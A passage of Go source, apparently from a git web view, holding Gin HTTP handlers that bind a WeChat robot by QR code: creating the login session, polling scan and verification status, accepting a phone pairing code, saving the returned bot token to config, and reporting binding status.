c.JSON(http.StatusBadGateway, gin.H{"error": "获取二维码失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
if qr.QRCode == "" || qr.QRCodeImgContent == "" {
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": "微信服务器未返回有效二维码"})
|
||||
return
|
||||
}
|
||||
|
||||
sessionKey := uuid.New().String()
|
||||
h.mu.Lock()
|
||||
h.logins[sessionKey] = &wechatLoginSession{
|
||||
QRCode: qr.QRCode,
|
||||
QRCodeImgURL: qr.QRCodeImgContent,
|
||||
CurrentBaseURL: baseURL,
|
||||
StartedAt: time.Now(),
|
||||
}
|
||||
h.mu.Unlock()
|
||||
|
||||
resp := gin.H{
|
||||
"session_key": sessionKey,
|
||||
"qrcode": qr.QRCode,
|
||||
"qrcode_open_url": qr.QRCodeImgContent,
|
||||
"message": "请使用微信扫描二维码并确认绑定",
|
||||
}
|
||||
if dataURL, err := ilink.QRCodeDataURL(qr.QRCodeImgContent, 256); err != nil {
|
||||
h.logger.Warn("生成二维码图片失败", zap.Error(err))
|
||||
} else {
|
||||
resp["qrcode_image_data_url"] = dataURL
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, resp)
|
||||
}
|
||||
|
||||
// HandleWechatQRCodeStatus GET /api/robot/wechat/qrcode/status — 轮询扫码状态
|
||||
func (h *WechatRobotHandler) HandleWechatQRCodeStatus(c *gin.Context) {
|
||||
sessionKey := c.Query("session_key")
|
||||
verifyCode := c.Query("verify_code")
|
||||
if sessionKey == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "缺少 session_key"})
|
||||
return
|
||||
}
|
||||
|
||||
h.mu.Lock()
|
||||
sess, ok := h.logins[sessionKey]
|
||||
h.mu.Unlock()
|
||||
if !ok {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "登录会话不存在或已过期,请重新生成二维码"})
|
||||
return
|
||||
}
|
||||
if time.Since(sess.StartedAt) > wechatLoginTTL {
|
||||
h.mu.Lock()
|
||||
delete(h.logins, sessionKey)
|
||||
h.mu.Unlock()
|
||||
c.JSON(http.StatusGone, gin.H{"error": "二维码已过期,请重新生成"})
|
||||
return
|
||||
}
|
||||
|
||||
baseURL := sess.CurrentBaseURL
|
||||
if baseURL == "" {
|
||||
baseURL = ilink.DefaultBaseURL
|
||||
}
|
||||
vc := verifyCode
|
||||
if vc == "" {
|
||||
vc = sess.PendingVerify
|
||||
}
|
||||
|
||||
client := h.ilinkClient(baseURL)
|
||||
ctx, cancel := context.WithTimeout(c.Request.Context(), 40*time.Second)
|
||||
defer cancel()
|
||||
|
||||
st, err := client.GetQRCodeStatus(ctx, sess.QRCode, vc)
|
||||
if err != nil {
|
||||
h.logger.Warn("轮询微信二维码状态失败", zap.Error(err))
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
switch st.Status {
|
||||
case "wait", "scaned":
|
||||
c.JSON(http.StatusOK, gin.H{"status": st.Status})
|
||||
return
|
||||
case "need_verifycode":
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"status": st.Status,
|
||||
"message": "请在手机微信查看配对数字,并在下方输入",
|
||||
})
|
||||
return
|
||||
case "scaned_but_redirect":
|
||||
if st.RedirectHost != "" {
|
||||
h.mu.Lock()
|
||||
if s, ok := h.logins[sessionKey]; ok {
|
||||
s.CurrentBaseURL = "https://" + st.RedirectHost
|
||||
}
|
||||
h.mu.Unlock()
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"status": st.Status})
|
||||
return
|
||||
case "binded_redirect":
|
||||
h.mu.Lock()
|
||||
delete(h.logins, sessionKey)
|
||||
h.mu.Unlock()
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"status": st.Status,
|
||||
"already_connected": true,
|
||||
"message": "该微信已绑定过,无需重复绑定",
|
||||
})
|
||||
return
|
||||
case "confirmed":
|
||||
if st.BotToken == "" || st.ILinkBotID == "" {
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": "绑定确认成功但缺少 bot_token"})
|
||||
return
|
||||
}
|
||||
saveBase := st.BaseURL
|
||||
if saveBase == "" {
|
||||
saveBase = baseURL
|
||||
}
|
||||
wc := h.config.Robots.Wechat
|
||||
wc.Enabled = true
|
||||
wc.BotToken = st.BotToken
|
||||
wc.ILinkBotID = st.ILinkBotID
|
||||
wc.ILinkUserID = st.ILinkUserID
|
||||
wc.BaseURL = saveBase
|
||||
if wc.BotType == "" {
|
||||
wc.BotType = ilink.DefaultBotType
|
||||
}
|
||||
if wc.BotAgent == "" {
|
||||
wc.BotAgent = ilink.DefaultBotAgent
|
||||
}
|
||||
if h.configSaver != nil {
|
||||
if err := h.configSaver.ApplyWechatRobotBinding(wc); err != nil {
|
||||
h.logger.Warn("保存微信机器人配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
} else {
|
||||
h.config.Robots.Wechat = wc
|
||||
}
|
||||
h.mu.Lock()
|
||||
delete(h.logins, sessionKey)
|
||||
h.mu.Unlock()
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"status": "confirmed",
|
||||
"message": "绑定成功,微信机器人已启用",
|
||||
"ilink_bot_id": st.ILinkBotID,
|
||||
"ilink_user_id": st.ILinkUserID,
|
||||
})
|
||||
return
|
||||
default:
|
||||
c.JSON(http.StatusOK, gin.H{"status": st.Status})
|
||||
}
|
||||
}
|
||||
|
||||
// HandleWechatVerifyCode POST /api/robot/wechat/qrcode/verify — 提交手机配对数字
|
||||
func (h *WechatRobotHandler) HandleWechatVerifyCode(c *gin.Context) {
|
||||
var req struct {
|
||||
SessionKey string `json:"session_key"`
|
||||
VerifyCode string `json:"verify_code"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil || req.SessionKey == "" || req.VerifyCode == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "需要 session_key 与 verify_code"})
|
||||
return
|
||||
}
|
||||
h.mu.Lock()
|
||||
sess, ok := h.logins[req.SessionKey]
|
||||
if ok {
|
||||
sess.PendingVerify = req.VerifyCode
|
||||
}
|
||||
h.mu.Unlock()
|
||||
if !ok {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "登录会话不存在或已过期"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "已提交配对码,请继续等待绑定"})
|
||||
}
|
||||
|
||||
// HandleWechatStatus GET /api/robot/wechat/status — 当前绑定状态(供前端展示)
|
||||
func (h *WechatRobotHandler) HandleWechatStatus(c *gin.Context) {
|
||||
wc := h.config.Robots.Wechat
|
||||
bound := wc.BotToken != "" && wc.ILinkBotID != ""
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"enabled": wc.Enabled,
|
||||
"bound": bound,
|
||||
"ilink_bot_id": wc.ILinkBotID,
|
||||
"ilink_user_id": wc.ILinkUserID,
|
||||
"base_url": wc.BaseURL,
|
||||
})
|
||||
}
|
||||
Reference in New Issue
Block a user